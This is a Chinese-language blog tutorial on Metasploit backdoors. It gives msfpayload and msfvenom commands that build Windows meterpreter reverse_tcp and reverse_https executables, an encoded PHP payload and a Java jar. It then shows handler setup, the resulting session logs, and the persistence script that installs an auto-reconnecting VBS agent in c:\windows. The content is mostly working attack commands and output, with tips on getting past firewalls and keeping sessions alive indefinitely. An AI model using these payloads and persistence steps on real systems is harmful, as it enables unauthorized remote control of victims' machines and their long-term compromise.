Metasploit可执行后门

目录

msfpayload as shellcode

persistence


他能生成LINUX  WINDOWS PHP ASP JSP等等的后门哦

 

msfpayload as shellcode

查看全部列表 目前有:248 蛋

root@kali:/home/brk# msfpayload -l

Metasploit可执行后门

他能生成多种多样的
简单的来说一个

正常的Windows后门

:用的是:windows/meterpreter/reverse_tcp

msfpayload windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=8080 R | \
  msfencode -b '' -t exe -o /var/www/meterpreter.exe

Metasploit可执行后门

生成以后让目标运行 我们需要进行监听,或者SHELL

msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 5.5.5.1
LHOST => 5.5.5.1
msf  exploit(handler) > set LPORT 8080
LPORT => 8080
msf  exploit(handler) > exploit 

[*] Started reverse handler on 5.5.5.1:8080
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 5.5.5.3
[*] Meterpreter session 1 opened (5.5.5.1:8080 -> 5.5.5.3:1055) at 2020-03-21 23:26:58 +0800

meterpreter >

其他(php asp jsp dll)

选中你的msfpayload名字,生成,你动的 例如:
Dll:

Metasploit可执行后门

php:

 msf payload(bind_php) > generate -t raw -e php/base64
eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));

JAVA:

 ./msfpayload java/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=4444 W > /tmp/job.jar

 

不正常的Windows后门

说到正常的肯定有不正常的 例如:reverse_https reverse_http
大家都晓得 这东西秒杀防火墙的,在生成的过程中,党意外中断的链接我们可以再继续链接,就像灰鸽子一样,默认是5分钟,你可以设置SessionExpirationTimeout选项为0,代表链接永远不会过期。

brk@Dis9Team:~$ sudo msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=5.5.5.1 LPORT=1111 > https.exe
brk@Dis9Team:~$ file https.exe
https.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

现在我们来运行他。

msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf  exploit(handler) > set LHOST 5.5.5.1
LHOST => 5.5.5.1
msf  exploit(handler) > set LPORT 1111
LPORT => 1111
msf  exploit(handler) > set SessionCommunicationTimeout 0
SessionCommunicationTimeout => 0
msf  exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf  exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://5.5.5.1:1111/
msf  exploit(handler) > [*] Starting the payload handler...
[*] 5.5.5.3:1060 Request received for /AauE...
[*] 5.5.5.3:1060 Staging connection for target /AauE received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 2 opened (5.5.5.1:1111 -> 5.5.5.3:1060) at 2020-03-21 23:40:06 +0800

成功了,多点了一下 两个SHELL 我们吧SHELL绘画删除了

msf  exploit(handler) > sessions 

Active sessions
===============

  Id  Type                   Information                    Connection
  --  ----                   -----------                    ----------
  2   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1  5.5.5.1:1111 -> 5.5.5.3:1060 (5.5.5.3)
  3   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1  5.5.5.1:1111 -> 5.5.5.3:1118 (5.5.5.3)
msf  exploit(handler) > sessions -k 2
[*] Killing session 2
[*] Meterpreter session 2 closed.
msf  exploit(handler) > sessions -k 3
[*] Killing session 3
[*] Meterpreter session 3 closed.
msf  exploit(handler) > sessions 

Active sessions
===============

No active sessions.

msf  exploit(handler) >

继续监听:

msf  exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://5.5.5.1:1111/
[*] Starting the payload handler...
msf  exploit(handler) > [*] 5.5.5.3:1280 Request received for /AauE...
[*] 5.5.5.3:1280 Staging connection for target /AauE received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 4 opened (5.5.5.1:1111 -> 5.5.5.3:1280) at 2012-03-21 23:45:57 +0800

继续获得了SHELL

persistence

这货是POST EXPLOITS模块的,前提你要有SHELL绘画,创建持续的后门,作为系统服务器启动
先来链接SHELL,查看帮助先:

msf  exploit(handler) > sessions -i 4
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching multi/handler to connect to the agent
    -L   Location in target host where to write payload to, if none %TEMP% will be used.
    -P   Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T   Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i   The interval in seconds between each connection attempt
    -p   The port on the remote host where Metasploit is listening
    -r   The IP of the system running Metasploit listening for the connect back

meterpreter >

下面我们来运行:

meterpreter > run persistence -A -L c:\\windows\\ -x -i 5 -p 1234 -r 5.5.5.1
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=1234
[*] Persistent agent script is 609512 bytes long
[+] Persistent Script written to c:\windows\\FBEzRzQYpXKFg.vbs
[*] Starting connection handler at port 1234 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Executing script c:\windows\\FBEzRzQYpXKFg.vbs
[+] Agent executed with PID 3280
meterpreter >

 

 

安装到了 c:\windows 每隔5秒监听端口1234,本机是5.5.5.1
 

 

 

上一篇:20182217_刘洪宇 后门原理与实践 EXP2


下一篇:Meterpreter使用